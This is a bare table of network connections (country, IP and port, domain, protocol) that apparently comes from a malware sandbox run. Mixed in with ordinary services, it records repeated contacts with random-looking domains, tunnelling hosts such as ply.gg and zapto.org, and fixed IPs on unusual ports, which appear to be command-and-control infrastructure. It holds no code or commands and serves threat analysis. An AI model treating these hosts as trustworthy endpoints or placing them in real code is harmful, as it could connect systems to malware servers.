| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| BG | 195.230.23.72:8085 | 195.230.23.72 | tcp |
| CN | 47.92.192.119:8443 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | boot.net.anydesk.com | udp |
| FR | 141.95.145.210:443 | boot.net.anydesk.com | tcp |
| FR | 141.95.145.210:443 | boot.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | relay-ad195ac5.net.anydesk.com | udp |
| GB | 57.128.141.163:443 | relay-ad195ac5.net.anydesk.com | tcp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 8.8.8.8:53 | 210.145.95.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.141.128.57.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.102.255.239.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| DE | 185.218.125.157:21441 | tcp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | VIPEEK1990-25013.portmap.host | udp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| NL | 38.180.123.95:3232 | tcp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | rddissisifigifidi.net | udp |
| BG | 195.230.23.72:80 | tcp | |
| US | 162.159.135.232:443 | discord.com | tcp |
| RU | 185.215.113.66:80 | rddissisifigifidi.net | tcp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| BG | 195.230.23.72:80 | tcp | |
| US | 8.8.8.8:53 | 66.113.215.185.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | educational-reform.gl.at.ply.gg | udp |
| US | 147.185.221.22:49922 | educational-reform.gl.at.ply.gg | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | peerhost59mj7i6macla65r.com | udp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 94.156.177.33:80 | 94.156.177.33 | tcp |
| BG | 195.230.23.72:80 | tcp | |
| NL | 89.110.69.103:80 | tcp | |
| US | 8.8.8.8:53 | www.google.com | udp |
| BG | 195.230.23.72:80 | tcp | |
| RU | 185.215.113.66:80 | rddissisifigifidi.net | tcp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | chrome.google.com | udp |
| FR | 142.250.179.78:443 | chrome.google.com | tcp |
| US | 8.8.8.8:53 | 164.20.217.172.in-addr.arpa | udp |
| FR | 172.217.20.206:443 | clients2.google.com | tcp |
| US | 20.83.148.22:80 | tcp | |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| FR | 172.217.20.206:443 | clients2.google.com | tcp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| IN | 43.240.65.55:81 | 43.240.65.55 | tcp |
| US | 8.8.8.8:53 | 33.177.156.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.20.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.74.250.142.in-addr.arpa | udp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| US | 154.216.17.90:80 | tcp | |
| US | 8.8.8.8:53 | 55.65.240.43.in-addr.arpa | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| TH | 165.154.184.75:80 | 165.154.184.75 | tcp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| DE | 212.113.107.84:80 | 212.113.107.84 | tcp |
| NL | 89.110.69.103:80 | tcp | |
| US | 8.8.8.8:53 | 75.184.154.165.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.107.113.212.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | camp.zapto.org | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| NL | 38.180.123.95:3232 | tcp | |
| TH | 165.154.184.75:80 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 94.156.177.33:80 | 94.156.177.33 | tcp |
| US | 8.8.8.8:53 | www.pornhub.com | udp |
| US | 66.254.114.41:443 | www.pornhub.com | tcp |
| US | 66.254.114.41:443 | www.pornhub.com | tcp |
| CN | 114.55.106.136:80 | tcp | |
| TH | 165.154.184.75:80 | 165.154.184.75 | tcp |
| US | 8.8.8.8:53 | 41.114.254.66.in-addr.arpa | udp |
| RU | 185.215.113.66:80 | rddissisifigifidi.net | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| RU | 185.215.113.66:80 | rddissisifigifidi.net | tcp |
| US | 8.8.8.8:53 | www.grupodulcemar.pe | udp |
| PE | 161.132.57.101:443 | www.grupodulcemar.pe | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| PE | 161.132.57.101:443 | www.grupodulcemar.pe | tcp |
| US | 8.8.8.8:53 | 101.57.132.161.in-addr.arpa | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| US | 8.8.8.8:53 | twizt.net | udp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| US | 147.185.221.22:49922 | educational-reform.gl.at.ply.gg | tcp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| NL | 178.132.2.10:4000 | tcp | |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| PE | 161.132.57.101:443 | www.grupodulcemar.pe | tcp |
| BG | 195.230.23.72:80 | tcp | |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| PE | 161.132.57.101:443 | www.grupodulcemar.pe | tcp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| HK | 47.244.167.171:801 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 84.113.215.185.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| NL | 38.180.123.95:3232 | tcp | |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | infect-crackle.cyou | udp |
| US | 104.21.45.165:443 | infect-crackle.cyou | tcp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| US | 8.8.8.8:53 | zinc-sneark.biz | udp |
| US | 8.8.8.8:53 | dwell-exclaim.biz | udp |
| US | 8.8.8.8:53 | 165.45.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | formy-spill.biz | udp |
| US | 172.67.206.64:443 | covery-mover.biz | tcp |
| US | 8.8.8.8:53 | dare-curbys.biz | udp |
| US | 8.8.8.8:53 | print-vexer.biz | udp |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| CN | 112.124.68.87:2222 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| CN | 1.94.204.34:4444 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.109.209.108:80 | www.update.microsoft.com | tcp |
| RU | 185.215.113.206:80 | 185.215.113.206 | tcp |
| US | 8.8.8.8:53 | 108.209.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.113.215.185.in-addr.arpa | udp |
| US | 154.216.17.90:80 | tcp | |
| US | 147.185.221.22:49922 | educational-reform.gl.at.ply.gg | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| KZ | 95.59.33.46:40500 | tcp | |
| MX | 189.252.61.8:40500 | udp | |
| US | 8.8.8.8:53 | sanboxland.pro | udp |
| GB | 89.35.131.209:80 | sanboxland.pro | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 8.61.252.189.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.131.35.89.in-addr.arpa | udp |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| CN | 1.94.204.34:4444 | tcp | |
| CN | 112.124.68.87:2222 | tcp | |
| HK | 43.226.125.43:10443 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| HK | 43.226.125.43:10443 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| CN | 39.106.152.236:11443 | tcp | |
| CN | 39.106.152.236:11443 | tcp | |
| US | 8.8.8.8:53 | ec2-18-166-176-228.ap-east-1.compute.amazonaws.com | udp |
| HK | 18.166.176.228:443 | ec2-18-166-176-228.ap-east-1.compute.amazonaws.com | tcp |
| HK | 18.166.176.228:443 | ec2-18-166-176-228.ap-east-1.compute.amazonaws.com | tcp |
| CN | 124.220.180.112:2087 | tcp | |
| CN | 124.220.180.112:2087 | tcp | |
| CN | 59.110.136.135:380 | tcp | |
| US | 8.8.8.8:53 | 43.125.226.43.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.176.166.18.in-addr.arpa | udp |
| NL | 38.180.123.95:3232 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| KZ | 88.204.209.230:40500 | udp | |
| CN | 59.110.136.135:380 | tcp | |
| RU | 185.215.113.209:80 | tcp | |
| US | 8.8.8.8:53 | 230.209.204.88.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| IR | 188.209.32.217:40500 | tcp | |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| US | 8.8.8.8:53 | adoring-lumiere.94-20-88-63.plesk.page | udp |
| BG | 195.230.23.72:80 | tcp | |
| AZ | 94.20.88.63:80 | adoring-lumiere.94-20-88-63.plesk.page | tcp |
| BG | 195.230.23.72:80 | tcp | |
| US | 8.8.8.8:53 | 63.88.20.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | paonancs.cn | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| HK | 156.225.19.202:80 | paonancs.cn | tcp |
| AF | 149.54.35.210:40500 | udp | |
| RU | 185.215.113.67:21405 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| BG | 195.230.23.72:80 | tcp | |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 210.35.54.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.19.225.156.in-addr.arpa | udp |
| RU | 80.66.75.114:80 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| MX | 201.108.200.21:40500 | udp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 21.200.108.201.in-addr.arpa | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| US | 8.8.8.8:53 | camp.zapto.org | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| KZ | 178.89.183.83:40500 | udp | |
| US | 8.8.8.8:53 | 83.183.89.178.in-addr.arpa | udp |
| RU | 80.66.75.114:80 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 154.216.17.90:80 | tcp | |
| AO | 129.122.183.25:40500 | udp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | 25.183.122.129.in-addr.arpa | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| NL | 38.180.123.95:3232 | tcp | |
| US | 147.185.221.22:49922 | educational-reform.gl.at.ply.gg | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| UZ | 90.156.164.28:40500 | udp | |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | 28.164.156.90.in-addr.arpa | udp |
| UZ | 195.158.22.210:40500 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| BG | 195.230.23.72:80 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| IR | 5.232.155.0:40500 | udp | |
| US | 8.8.8.8:53 | 0.155.232.5.in-addr.arpa | udp |
| RU | 185.215.113.67:21405 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| GB | 20.26.156.215:443 | github.com | tcp |
| BG | 195.230.23.72:80 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| UZ | 94.141.69.122:40500 | udp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 122.69.141.94.in-addr.arpa | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| RU | 92.244.232.104:40500 | udp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 104.232.244.92.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| AF | 149.54.20.134:40500 | udp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | 134.20.54.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | claywyaeropumps.com | udp |
| DE | 185.218.125.157:21441 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| NL | 38.180.123.95:3232 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| UZ | 90.156.160.54:40500 | udp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 54.160.156.90.in-addr.arpa | udp |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| CN | 183.57.21.131:8095 | tcp | |
| US | 147.185.221.22:49922 | educational-reform.gl.at.ply.gg | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| GT | 190.56.14.82:40500 | udp | |
| DE | 185.218.125.157:21441 | tcp | |
| IR | 46.248.34.105:40500 | tcp | |
| US | 8.8.8.8:53 | 82.14.56.190.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| RU | 185.215.113.67:21405 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| UZ | 90.156.163.10:40500 | udp | |
| US | 8.8.8.8:53 | 10.163.156.90.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| RU | 94.230.44.71:40500 | udp | |
| BG | 195.230.23.72:80 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| US | 8.8.8.8:53 | 71.44.230.94.in-addr.arpa | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 154.216.17.90:80 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| UZ | 86.62.3.67:40500 | udp | |
| GB | 20.26.156.215:443 | github.com | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 67.3.62.86.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| NL | 38.180.123.95:3232 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| MX | 189.141.139.39:40500 | udp | |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 39.139.141.189.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | camp.zapto.org | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| YE | 94.26.219.44:40500 | udp | |
| RU | 185.215.113.43:80 | 185.215.113.43 | tcp |
| US | 8.8.8.8:53 | 44.219.26.94.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| UZ | 89.249.62.7:40500 | tcp | |
| US | 147.185.221.22:49922 | educational-reform.gl.at.ply.gg | tcp |
| RU | 185.215.113.67:21405 | tcp | |
| RU | 185.215.113.43:80 | 185.215.113.43 | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| KZ | 88.204.241.182:40500 | udp | |
| N/A | 127.0.0.1:58963 | tcp | |
| US | 8.8.8.8:53 | 182.241.204.88.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | funletters.net | udp |
| US | 208.122.221.162:80 | funletters.net | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| HK | 134.122.129.19:80 | 134.122.129.19 | tcp |
| US | 8.8.8.8:53 | 19.129.122.134.in-addr.arpa | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| IR | 2.181.252.24:40500 | udp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 24.252.181.2.in-addr.arpa | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| UZ | 217.30.162.244:40500 | udp | |
| US | 8.8.8.8:53 | 244.162.30.217.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| NL | 38.180.123.95:3232 | tcp | |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| BG | 195.230.23.72:80 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| BG | 195.230.23.72:80 | tcp | |
| UZ | 92.38.19.10:40500 | udp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | 10.19.38.92.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| RU | 83.239.55.170:40500 | udp | |
| US | 8.8.8.8:53 | 170.55.239.83.in-addr.arpa | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| NL | 178.132.2.10:4000 | tcp | |
| KZ | 178.91.167.50:40500 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 147.185.221.22:49922 | educational-reform.gl.at.ply.gg | tcp |
| UZ | 195.158.18.194:40500 | udp | |
| RU | 185.215.113.67:21405 | tcp | |
| US | 8.8.8.8:53 | 194.18.158.195.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 154.216.17.90:80 | tcp | |
| KZ | 37.99.54.230:40500 | udp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | 230.54.99.37.in-addr.arpa | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| SY | 77.44.198.123:40500 | udp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| NL | 38.180.123.95:3232 | tcp | |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 123.198.44.77.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| UZ | 89.236.218.158:40500 | udp | |
| US | 8.8.8.8:53 | 158.218.236.89.in-addr.arpa | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| CN | 150.158.37.254:80 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| NL | 89.110.69.103:80 | tcp | |
| KZ | 5.76.0.203:40500 | udp | |
| US | 8.8.8.8:53 | 203.0.76.5.in-addr.arpa | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 20.83.148.22:80 | tcp | |
| DE | 94.156.177.33:80 | 94.156.177.33 | tcp |
| NL | 89.110.69.103:80 | tcp | |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| KZ | 31.171.185.170:40500 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| UZ | 93.188.85.2:40500 | udp | |
| US | 8.8.8.8:53 | 2.85.188.93.in-addr.arpa | udp |
| US | 147.185.221.22:49922 | educational-reform.gl.at.ply.gg | tcp |
| RU | 185.215.113.67:21405 | tcp | |
| CN | 150.158.37.254:80 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| KG | 212.112.121.59:40500 | udp | |
| US | 8.8.8.8:53 | 59.121.112.212.in-addr.arpa | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | camp.zapto.org | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| TM | 91.202.233.141:80 | 91.202.233.141 | tcp |
| TM | 91.202.233.141:80 | 91.202.233.141 | tcp |
| US | 8.8.8.8:53 | 141.233.202.91.in-addr.arpa | udp |
| NL | 38.180.123.95:3232 | tcp | |
| IR | 46.167.149.255:40500 | udp | |
| US | 8.8.8.8:53 | 255.149.167.46.in-addr.arpa | udp |
| CN | 183.57.21.131:8095 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| UZ | 213.230.99.119:40500 | udp | |
